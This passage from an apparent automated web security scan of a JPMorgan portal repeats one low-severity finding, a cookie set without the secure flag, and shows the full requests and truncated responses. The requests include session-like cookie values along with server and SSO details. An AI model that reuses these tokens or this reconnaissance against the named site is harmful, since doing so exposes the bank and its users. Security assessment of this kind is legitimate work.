Date: Tue, 12 Jul 2011 16:29:57 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"175-1310119380000"
Last-Modified: Fri, 08 Jul 2011 10:03:00 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:29:57 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 175
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.......................................................................................................!.......,..........,..i.T!..U.FY.1h..I..$Z.h..P......Bc1h
..E. ..;

7.75. https://mm.jpmorgan.com/images/btn_right_side.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/images/btn_right_side.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btn_right_side.gif HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:57 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"174-1310119378000"
Last-Modified: Fri, 08 Jul 2011 10:02:58 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:29:57 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 174
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.......................................................................................................!.......,..........+..m..Q."U.Ei..A..HZ.hN.]._....|
..`.<
-.h...;

7.76. https://mm.jpmorgan.com/images/icons/attention.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/images/icons/attention.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/attention.gif HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:30:27 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"709-1310119382000"
Last-Modified: Fri, 08 Jul 2011 10:03:02 GMT
Cache-Control: max-age=432000
Expires: Sun, 17 Jul 2011 16:30:27 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 709
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.....v..c..\..Q....._..X..m..b..[...D........E..G..H.U..i..q..[...............v.~4..=..J.....z........Z..3..7.......~4.....9.t".~1.f..J...A....}+.z$..............K._......_....m.....e.....n..m..
...[SNIP]...

7.77. https://mm.jpmorgan.com/images/menu_bg_img.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/images/menu_bg_img.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/menu_bg_img.jpg HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:57 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"4057-1310119380000"
Last-Modified: Fri, 08 Jul 2011 10:03:00 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:57 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 4057
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
. .

.....
...........................

.............................................................@....
...[SNIP]...

7.78. https://mm.jpmorgan.com/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.jsp?pageName=country_earea HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.4.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA

Response

HTTP/1.1 302 Found
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:21 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Location: https://iblogin.jpmorgan.com/sso/action/federateLogin?URI=https%3a%2f%2fmm.jpmorgan.com%3a443%2findex.jsp%3fpageName%3dcountry_earea&msg=+&securityLevel=0&cs=67%2bwndJznEzJNkT9QmX2jX9JYMs%3d
Vary: Accept-Encoding
Content-Length: 386
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://iblogin.jpmorgan.com/sso/action/federat
...[SNIP]...

7.79. https://mm.jpmorgan.com/js/dropdowns.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/dropdowns.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/dropdowns.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:52 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"23404-1310119354000"
Last-Modified: Fri, 08 Jul 2011 10:02:34 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:52 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 23404
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

// Function to get a new XML Http Request object
function AJAXRequest() {
   if (window.XMLHttpRequest) {
       return new XMLHttpRequest();
   }
   else if (window.ActiveXObject) {
       return new ActiveXOb
...[SNIP]...

7.80. https://mm.jpmorgan.com/js/feedback.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/feedback.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/feedback.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

7.81. https://mm.jpmorgan.com/js/gecFunctions.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/gecFunctions.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/gecFunctions.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:52 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"1705-1310119354000"
Last-Modified: Fri, 08 Jul 2011 10:02:34 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:52 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 1705
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

var submitGecForm = function() {
if (document.getElementById('gecForm').action != 'MorganMarkets?page=global_equity_coverage') {
document.getElementById('gecForm').action = 'MorganMarkets?page=gl
...[SNIP]...

7.82. https://mm.jpmorgan.com/js/menu.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/menu.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/menu.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:51 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"6916-1310119354000"
Last-Modified: Fri, 08 Jul 2011 10:02:34 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:51 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 6916
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

function hideMenus(element) {
   if(YAHOO.env.ua.ie == 6) {
       return;
   }

   var lines = YAHOO.util.Dom.getElementsByClassName('showLine', 'li', 'jpmmenu');
   var subLines = YAHOO.util.Dom.getElemen
...[SNIP]...

7.83. https://mm.jpmorgan.com/js/personalisation.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/personalisation.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/personalisation.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:52 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"15959-1310119354000"
Last-Modified: Fri, 08 Jul 2011 10:02:34 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:52 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 15959
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

//Function to get a new XML Http Request object
function AJAXRequest() {
   if (window.XMLHttpRequest) {
       return new XMLHttpRequest();
   }
   else if (window.ActiveXObject) {
       return new ActiveXObj
...[SNIP]...

7.84. https://mm.jpmorgan.com/js/portalBondIndex.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/portalBondIndex.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/portalBondIndex.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:53 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"8066-1310119358000"
Last-Modified: Fri, 08 Jul 2011 10:02:38 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:53 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 8066
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

function makeUrl(url) {
//prefixUrl = "http://morganmarkets.jpmorgan.com";
prefixUrl = "";
fullUrl = prefixUrl + url;
return fullUrl;
}

function docLoc(relUrl) {
//prefix = 'http://mo
...[SNIP]...

7.85. https://mm.jpmorgan.com/js/portlet.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/portlet.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/portlet.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:51 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"7376-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:51 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 7376
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

function refreshAllCheckBoxDivs(portletId,checkBoxSize,displayMaxRows)
{
// var displayMaxRows = 10;
   var portletDiv = document.getElementById(portletId);
   var visibleDivs = 0;
   var chec
...[SNIP]...

7.86. https://mm.jpmorgan.com/js/yui/button-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/yui/button-min.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/yui/button-min.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:54 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"27973-1310119356000"
